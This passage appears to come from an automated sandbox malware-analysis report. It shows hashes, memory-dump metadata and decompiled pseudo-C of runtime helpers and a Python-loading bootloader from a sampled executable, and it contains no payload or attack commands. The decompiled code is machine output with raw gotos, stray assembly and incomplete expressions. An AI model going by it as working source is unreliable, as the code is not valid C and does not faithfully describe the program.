0x7ff7da8e11eb
0x7ff7da8e11f4
0x7ff7da8e11fb
0x7ff7da8e11ff
0x7ff7da8e1205
0x7ff7da8e120a
0x7ff7da8e120c
0x7ff7da8e1210
0x7ff7da8e1216
0x7ff7da8e121a
0x7ff7da8e1220
0x7ff7da8e1224
0x7ff7da8e122a
0x7ff7da8e122f
0x7ff7da8e1233
0x7ff7da8e1236
0x7ff7da8e123b
0x7ff7da8e123f
0x7ff7da8e124c
0x7ff7da8e1251
0x7ff7da8e1257
0x7ff7da8e125e
0x7ff7da8e126b
0x7ff7da8e127a
0x7ff7da8e127e
0x7ff7da8e1280
0x7ff7da8e1283
0x7ff7da8e128a
0x7ff7da8e129a
0x7ff7da8e12a1
0x7ff7da8e12a9
0x7ff7da8e12ab
0x7ff7da8e12af
0x7ff7da8e12b3
0x7ff7da8e12bc
0x7ff7da8e12c1
0x7ff7da8e12c6
0x7ff7da8e12ca
0x7ff7da8e12d7
0x7ff7da8e12dd
0x7ff7da8e12e6
0x7ff7da8e12e8
0x7ff7da8e12f0
0x7ff7da8e12f3
0x7ff7da8e1312

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
Instruction ID: dddea456c945a9921b9e3d657ea1cf80316410626ced99a4ff121d4bfe162071
Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
Instruction Fuzzy Hash: 3D51DF32A18651C1F7269B28C44022CA3A1FB75B59FE45172CE8C577D6CB3FEA62C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E4EA0 Relevance: .1, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8E4EA0(signed int __ecx, signed int __edx, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8) {
				unsigned int _t13;
				unsigned int _t14;
				char _t15;
				char _t33;
				signed int* _t41;
				void* _t52;

				if (__eflags == 0) goto 0xda8e4f5b;
				if ((__ecx & 0x00000007) == 0) goto 0xda8e4ec0;
				_t13 =  *((intOrPtr*)(__rcx));
				if (_t13 == 0) goto 0xda8e4f36;
				_t41 = __rcx + 1;
				if ((__ecx & 0x00000007) != 0) goto 0xda8e4eb1;
				if ((0x01010100 & ( *_t41 ^ 0xffffffff ^ 0xfefefeff +  *_t41)) == 0) goto 0xda8e4ec0;
				if (_t13 == 0) goto 0xda8e4f36;
				if (_t13 == 0) goto 0xda8e4f36;
				if (_t13 == 0) goto 0xda8e4f36;
				if (_t13 == 0) goto 0xda8e4f36;
				if (_t13 == 0) goto 0xda8e4f36;
				if (_t13 == 0) goto 0xda8e4f36;
				_t14 = _t13 >> 0x10;
				if (_t14 == 0) goto 0xda8e4f36;
				if (_t14 == 0) goto 0xda8e4f36;
				goto 0xda8e4ec0;
				_t52 =  &(_t41[2]) - 8 + 8 - __rdx;
				if ((__edx & 0x00000007) == 0) goto 0xda8e4f68;
				_t15 =  *((intOrPtr*)(__rdx));
				 *((char*)(__rdx + _t52)) = _t15;
				_t33 = _t15;
				if (_t33 == 0) goto 0xda8e4f5b;
				if (_t33 == 0) goto 0xda8e4f56;
				if ((__edx & 0x00000007) != 0) goto 0xda8e4f3e;
				goto 0xda8e4f68;
				 *((char*)(__rdx + 1 + _t52)) = 0;
				return 0;
			}

0x7ff7da8e4ea6
0x7ff7da8e4eaf
0x7ff7da8e4eb1
0x7ff7da8e4eb5
0x7ff7da8e4eb7
0x7ff7da8e4ebd
0x7ff7da8e4eeb
0x7ff7da8e4ef3
0x7ff7da8e4efa
0x7ff7da8e4f05
0x7ff7da8e4f0c
0x7ff7da8e4f17
0x7ff7da8e4f1e
0x7ff7da8e4f23
0x7ff7da8e4f28
0x7ff7da8e4f2f
0x7ff7da8e4f34
0x7ff7da8e4f36
0x7ff7da8e4f3c
0x7ff7da8e4f3e
0x7ff7da8e4f40
0x7ff7da8e4f43
0x7ff7da8e4f45
0x7ff7da8e4f4d
0x7ff7da8e4f52
0x7ff7da8e4f54
0x7ff7da8e4f58
0x7ff7da8e4f5e

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 74628bb9cbb62325eaa5d9ece74818a69af278518b58eb77a6deec5e27ed6ede
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 8141AC52C0964AC4F9A7AA18050067C9680BF72FA0ED852F6ED9D533D3DD1F6BA7C221

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E8AF0 Relevance: .1, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00007FF77FF7DA8E8AF0(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0xda8e8c84;
				_t124 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0xda8e8bf6;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0xda8e8b92;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E00007FF77FF7DA8F244C(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E00007FF77FF7DA8E9D68(_t66, _t111);
				if (_t66 != 0) goto 0xda8e8bba;
				_t104 = _t76 + 4;
				r8d = 8;
				E00007FF77FF7DA8F244C(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E00007FF77FF7DA8E9D68(_t66, _t111);
				if (_t129 == 0) goto 0xda8e8c84;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0xda8e8bf6;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0xda90d008; // 0xde4e6c2f3c2e
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0xda90d008; // 0xde4e6c2f3c2e
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0xda90d008; // 0xde4e6c2f3c2e
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0xda90d008; // 0xde4e6c2f3c2e
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0xda8e8c87;
				return 0xffffffff;
			}

0x7ff7da8e8af0
0x7ff7da8e8af0
0x7ff7da8e8af0
0x7ff7da8e8af5
0x7ff7da8e8afa
0x7ff7da8e8b08
0x7ff7da8e8b0d
0x7ff7da8e8b10
0x7ff7da8e8b16
0x7ff7da8e8b1c
0x7ff7da8e8b29
0x7ff7da8e8b32
0x7ff7da8e8b3c
0x7ff7da8e8b40
0x7ff7da8e8b43
0x7ff7da8e8b49
0x7ff7da8e8b57
0x7ff7da8e8b61
0x7ff7da8e8b65
0x7ff7da8e8b68
0x7ff7da8e8b6b
0x7ff7da8e8b72
0x7ff7da8e8b74
0x7ff7da8e8b74
0x7ff7da8e8b7e
0x7ff7da8e8b88
0x7ff7da8e8b90
0x7ff7da8e8b92
0x7ff7da8e8b96
0x7ff7da8e8ba2
0x7ff7da8e8ba9
0x7ff7da8e8bac
0x7ff7da8e8bb4
0x7ff7da8e8bc1
0x7ff7da8e8bc5
0x7ff7da8e8bdd
0x7ff7da8e8be1
0x7ff7da8e8be4
0x7ff7da8e8bec
0x7ff7da8e8bef
0x7ff7da8e8bf6
0x7ff7da8e8c15
0x7ff7da8e8c1b
0x7ff7da8e8c1e
0x7ff7da8e8c31
0x7ff7da8e8c3a
0x7ff7da8e8c40
0x7ff7da8e8c51
0x7ff7da8e8c5a
0x7ff7da8e8c5e
0x7ff7da8e8c6a
0x7ff7da8e8c73
0x7ff7da8e8c7e
0x7ff7da8e8c82
0x7ff7da8e8c9f

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 7b72f3365bb0bfc0fee784a6e9437690aec08aaea9362de7864ded4306c7fffd
Instruction ID: 499b1bf0ce75ecdcb6b35ab565bc3ed6cab57a2f8d0ceb2d5a4e31df61420fc8
Opcode Fuzzy Hash: 7b72f3365bb0bfc0fee784a6e9437690aec08aaea9362de7864ded4306c7fffd
Instruction Fuzzy Hash: 7B412163714A5582FF04DF2AD9140ADB7A1BB58FD4B889033EE4D97B59DE3DD1528300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E64B0 Relevance: .1, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 16%

			E00007FF77FF7DA8E64B0(intOrPtr __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				long long _v16;
				long long _v24;
				intOrPtr _v32;
				long long _v40;
				void* _t29;
				void* _t30;
				void* _t34;
				intOrPtr* _t61;
				intOrPtr* _t62;
				long long _t64;
				intOrPtr* _t84;
				long long _t91;

				_t61 = _t84;
				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = __rbp;
				 *((long long*)(_t61 + 0x18)) = __rsi;
				 *((long long*)(_t61 + 0x20)) = __rdi;
				r14d = 0;
				 *((long long*)(_t61 - 0x10)) = _t91;
				 *((long long*)(_t61 - 0x18)) = _t91;
				 *((intOrPtr*)(_t61 - 0x20)) = r14d;
				r9d = r9d | 0xffffffff;
				 *((long long*)(_t61 - 0x28)) = _t91;
				E00007FF77FF7DA8EF008();
				if (_t29 != 0) goto 0xda8e6509;
				_t30 = E00007FF77FF7DA8E4394(_t61);
				 *_t61 = 0x2a;
				goto 0xda8e653c;
				if (__rdx == 0) goto 0xda8e653c;
				_v16 = _t91;
				r9d = r9d | 0xffffffff;
				_v24 = _t91;
				_v32 = r14d;
				_v40 = _t91;
				E00007FF77FF7DA8EF008();
				if (_t30 == 0) goto 0xda8e64f9;
				E00007FF77FF7DA8EDC90(_t30, _t91 + _t30, __rdx);
				_t64 = _t61;
				if (_t61 != 0) goto 0xda8e655f;
				E00007FF77FF7DA8E9D68(_t61, _t91 + _t30);
				goto 0xda8e65e7;
				_v16 = _t91;
				r9d = r9d | 0xffffffff;
				_v24 = _t91;
				_v32 = __edi;
				_v40 = _t64;
				E00007FF77FF7DA8EF008();
				if (0 != 0) goto 0xda8e6599;
				_t34 = E00007FF77FF7DA8E4394(_t61);
				 *_t61 = 0x2a;
				goto 0xda8e6553;
				if (__rdx == 0) goto 0xda8e65cf;
				_t62 = _t64 + _t64;
				_v16 = _t91;
				_v24 = _t91;
				_v32 = __edi;
				r9d = r9d | 0xffffffff;
				_v40 = _t62;
				 *((char*)(_t62 - 1)) = 0x3d;
				E00007FF77FF7DA8EF008();
				if (_t34 == 0) goto 0xda8e6589;
				0xda8f01ec(_t91);
				return E00007FF77FF7DA8E9D68(_t62, _t64) & 0xffffff00 | _t34 == 0x00000000;
			}

0x7ff7da8e64b0
0x7ff7da8e64b3
0x7ff7da8e64b7
0x7ff7da8e64bb
0x7ff7da8e64bf
0x7ff7da8e64c9
0x7ff7da8e64cf
0x7ff7da8e64d6
0x7ff7da8e64dd
0x7ff7da8e64e1
0x7ff7da8e64e7
0x7ff7da8e64ed
0x7ff7da8e64f7
0x7ff7da8e64f9
0x7ff7da8e6501
0x7ff7da8e6507
0x7ff7da8e650c
0x7ff7da8e650e
0x7ff7da8e6513
0x7ff7da8e6517
0x7ff7da8e651f
0x7ff7da8e6528
0x7ff7da8e652d
0x7ff7da8e6537
0x7ff7da8e6544
0x7ff7da8e6549
0x7ff7da8e654f
0x7ff7da8e6553
0x7ff7da8e655a
0x7ff7da8e655f
0x7ff7da8e6564
0x7ff7da8e6568
0x7ff7da8e6570
0x7ff7da8e6578
0x7ff7da8e657d
0x7ff7da8e6587
0x7ff7da8e6589
0x7ff7da8e6591
0x7ff7da8e6597
0x7ff7da8e659c
0x7ff7da8e659e
0x7ff7da8e65a2
0x7ff7da8e65a9
0x7ff7da8e65ae
0x7ff7da8e65b2
0x7ff7da8e65b9
0x7ff7da8e65c0
0x7ff7da8e65c6
0x7ff7da8e65cd
0x7ff7da8e65d4
0x7ff7da8e6601

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0456c98d42a781b5c5bc1c2f312fc66b7cd87bccd02103b591818a6402ea132
Instruction ID: 5aa35d5496543894e7065a39696fe53944e5eb33aed742f082b9f8c1689b3679
Opcode Fuzzy Hash: f0456c98d42a781b5c5bc1c2f312fc66b7cd87bccd02103b591818a6402ea132
Instruction Fuzzy Hash: 8431E632B08B42C2F725EB25644012DBAD4BF95B90F84427AEE4E53B9BDF3DD6218714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F8900 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00007FF77FF7DA8F8900(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0xda91d3bc = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0xda8f8961;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0xda91d3bc; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0xda91d3bc = r8d;
				 *0xda91d3c0 = r8d;
				return 0;
			}

0x7ff7da8f8900
0x7ff7da8f8906
0x7ff7da8f890b
0x7ff7da8f8912
0x7ff7da8f8912
0x7ff7da8f8919
0x7ff7da8f891b
0x7ff7da8f8923
0x7ff7da8f8929
0x7ff7da8f892d
0x7ff7da8f8933
0x7ff7da8f8937
0x7ff7da8f8941
0x7ff7da8f894b
0x7ff7da8f8956
0x7ff7da8f895a
0x7ff7da8f8961
0x7ff7da8f896f

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34d5d8554d102006894240283a9d79e813511d862dc58987dc8a54cb8a7dc0d
Instruction ID: d17ccf798c827be894abdebc9b63f02b63558951f63f9e2f70c7c2730fe4e037
Opcode Fuzzy Hash: d34d5d8554d102006894240283a9d79e813511d862dc58987dc8a54cb8a7dc0d
Instruction Fuzzy Hash: 0FF06872B182958EEBA49F29A40262DB7D0F708388FC0807EE58DC3B04DA3C90618F24

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DB7E0 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346bd86ff2f8cc6f95113856949b039c2a110b7801ff982f45fbe19e3d045d96
Instruction ID: 6778c67a45b3582f48b183206e43fda469dd6d1a46d911e91d3c779b4b3e992a
Opcode Fuzzy Hash: 346bd86ff2f8cc6f95113856949b039c2a110b7801ff982f45fbe19e3d045d96
Instruction Fuzzy Hash: 5EA0022194CC0BD6FE46AF01E894038E330FBA4360BC504B7D84E421A29F3CB560C364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D3DD0 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00007FF77FF7DA8D3DD0(void* __edx, long long __rax, struct HINSTANCE__* __rbx, void* __rcx, void* _a8) {
				void* _t20;
				void* _t21;

				GetProcAddress(__rbx);
				 *0xda90dca8 = __rax;
				if (__rax != 0) goto 0xda8d3e1b;
				E00007FF77FF7DA8D2620(__rax, __rax, "GetProcAddress", "Failed to get address for Py_DontWriteBytecodeFlag\n", _t20, _t21);
				return 0xffffffff;
			}

0x7ff7da8d3de6
0x7ff7da8d3dec
0x7ff7da8d3df6
0x7ff7da8d3e06
0x7ff7da8d3e1a

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3DE6
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E25
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E4A
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E6F
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3E97
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3EBF
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3EE7
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3F0F
GetProcAddress.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D3F37

Strings

Failed to get address for PySys_GetObject, xrefs: 00007FF7DA8D4479
Py_FileSystemDefaultEncoding, xrefs: 00007FF7DA8D3E1B
Failed to get address for PyObject_CallFunction, xrefs: 00007FF7DA8D4339
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF7DA8D4609
Py_UTF8Mode, xrefs: 00007FF7DA8D3F5D
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF7DA8D41F9
Py_VerboseFlag, xrefs: 00007FF7DA8D3F05
Failed to get address for PyList_Append, xrefs: 00007FF7DA8D4299
Failed to get address for PyUnicode_Join, xrefs: 00007FF7DA8D4659
Failed to get address for Py_NoUserSiteDirectory, xrefs: 00007FF7DA8D3ED1
Py_FrozenFlag, xrefs: 00007FF7DA8D3E40
PyMarshal_ReadObjectFromString, xrefs: 00007FF7DA8D44FD
PyModule_GetDict, xrefs: 00007FF7DA8D42F5
Failed to get address for PyUnicode_FromString, xrefs: 00007FF7DA8D4541
Py_IgnoreEnvironmentFlag, xrefs: 00007FF7DA8D3E65
Failed to get address for Py_DecodeLocale, xrefs: 00007FF7DA8D4569
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF7DA8D4631
Failed to get address for PyModule_GetDict, xrefs: 00007FF7DA8D4311
Failed to get address for PyDict_GetItemString, xrefs: 00007FF7DA8D4109
PyUnicode_Replace, xrefs: 00007FF7DA8D4665
PySys_SetObject, xrefs: 00007FF7DA8D4485
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF7DA8D4361
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF7DA8D4389
Failed to get address for Py_FileSystemDefaultEncoding, xrefs: 00007FF7DA8D3E37
PyUnicode_FromString, xrefs: 00007FF7DA8D4525
Failed to get address for Py_UTF8Mode, xrefs: 00007FF7DA8D3F79
Failed to get address for PyErr_Clear, xrefs: 00007FF7DA8D4131
Py_DecRef, xrefs: 00007FF7DA8D3FAD
Py_GetPath, xrefs: 00007FF7DA8D4075
PyErr_Restore, xrefs: 00007FF7DA8D41B5
PySys_GetObject, xrefs: 00007FF7DA8D445D
Failed to get address for PyList_New, xrefs: 00007FF7DA8D42C1
Failed to get address for PyObject_Str, xrefs: 00007FF7DA8D43D9
Failed to get address for PyMem_RawFree, xrefs: 00007FF7DA8D4591
PyObject_SetAttrString, xrefs: 00007FF7DA8D436D
PySys_AddWarnOption, xrefs: 00007FF7DA8D440D
PyDict_GetItemString, xrefs: 00007FF7DA8D40ED
Failed to get address for Py_SetPath, xrefs: 00007FF7DA8D4069
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF7DA8D4249
Failed to get address for Py_GetPath, xrefs: 00007FF7DA8D4091
PyErr_Fetch, xrefs: 00007FF7DA8D418D
PyUnicode_Decode, xrefs: 00007FF7DA8D45C5
PyUnicode_Join, xrefs: 00007FF7DA8D463D
Py_Finalize, xrefs: 00007FF7DA8D3FD5
Failed to get address for Py_SetPythonHome, xrefs: 00007FF7DA8D40E1
PyImport_ImportModule, xrefs: 00007FF7DA8D4255
PyErr_NormalizeException, xrefs: 00007FF7DA8D41DD
Failed to get address for PySys_SetArgvEx, xrefs: 00007FF7DA8D4451
Failed to get address for Py_IgnoreEnvironmentFlag, xrefs: 00007FF7DA8D3E81
Failed to get address for PyUnicode_Decode, xrefs: 00007FF7DA8D45E1
Failed to get address for Py_BuildValue, xrefs: 00007FF7DA8D3FA1
Failed to get address for PyUnicode_Replace, xrefs: 00007FF7DA8D4681
Py_DontWriteBytecodeFlag, xrefs: 00007FF7DA8D3DDF
PyLong_AsLong, xrefs: 00007FF7DA8D42CD
Failed to get address for PyErr_Restore, xrefs: 00007FF7DA8D41D1
Failed to get address for Py_IncRef, xrefs: 00007FF7DA8D4019
Py_SetPythonHome, xrefs: 00007FF7DA8D40C5
Failed to get address for Py_SetProgramName, xrefs: 00007FF7DA8D40B9
PyErr_Clear, xrefs: 00007FF7DA8D4115
PyImport_AddModule, xrefs: 00007FF7DA8D4205
Py_DecodeLocale, xrefs: 00007FF7DA8D454D
PyImport_ExecCodeModule, xrefs: 00007FF7DA8D422D
Failed to get address for Py_NoSiteFlag, xrefs: 00007FF7DA8D3EA9
PyList_Append, xrefs: 00007FF7DA8D427D
PyMem_RawFree, xrefs: 00007FF7DA8D4575
PyObject_CallFunctionObjArgs, xrefs: 00007FF7DA8D4345
Failed to get address for Py_OptimizeFlag, xrefs: 00007FF7DA8D3EF9
Failed to get address for PySys_AddWarnOption, xrefs: 00007FF7DA8D4429
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF7DA8D4519
Failed to get address for PyErr_Print, xrefs: 00007FF7DA8D4181
Py_NoUserSiteDirectory, xrefs: 00007FF7DA8D3EB5
Failed to get address for Py_VerboseFlag, xrefs: 00007FF7DA8D3F21
PyUnicode_AsUTF8, xrefs: 00007FF7DA8D4615
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF7DA8D45B9
Failed to get address for Py_DecRef, xrefs: 00007FF7DA8D3FC9
PyErr_Print, xrefs: 00007FF7DA8D4165
PyUnicode_DecodeFSDefault, xrefs: 00007FF7DA8D45ED
PySys_SetArgvEx, xrefs: 00007FF7DA8D4435
PyUnicode_FromFormat, xrefs: 00007FF7DA8D459D
Failed to get address for PyImport_AddModule, xrefs: 00007FF7DA8D4221
Failed to get address for PyImport_ImportModule, xrefs: 00007FF7DA8D4271
Failed to get address for PySys_SetPath, xrefs: 00007FF7DA8D44C9
Failed to get address for PyErr_Occurred, xrefs: 00007FF7DA8D4159
Failed to get address for Py_DontWriteBytecodeFlag, xrefs: 00007FF7DA8D3DF8
Py_OptimizeFlag, xrefs: 00007FF7DA8D3EDD
Py_IncRef, xrefs: 00007FF7DA8D3FFD
Py_BuildValue, xrefs: 00007FF7DA8D3F85
Py_Initialize, xrefs: 00007FF7DA8D4025
PySys_SetPath, xrefs: 00007FF7DA8D44AD
PyList_New, xrefs: 00007FF7DA8D42A5
PyObject_CallFunction, xrefs: 00007FF7DA8D431D
Failed to get address for PyEval_EvalCode, xrefs: 00007FF7DA8D44F1
PyRun_SimpleStringFlags, xrefs: 00007FF7DA8D43E5
Failed to get address for Py_UnbufferedStdioFlag, xrefs: 00007FF7DA8D3F49
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF7DA8D43B1
Failed to get address for PyLong_AsLong, xrefs: 00007FF7DA8D42E9
PyObject_Str, xrefs: 00007FF7DA8D43BD
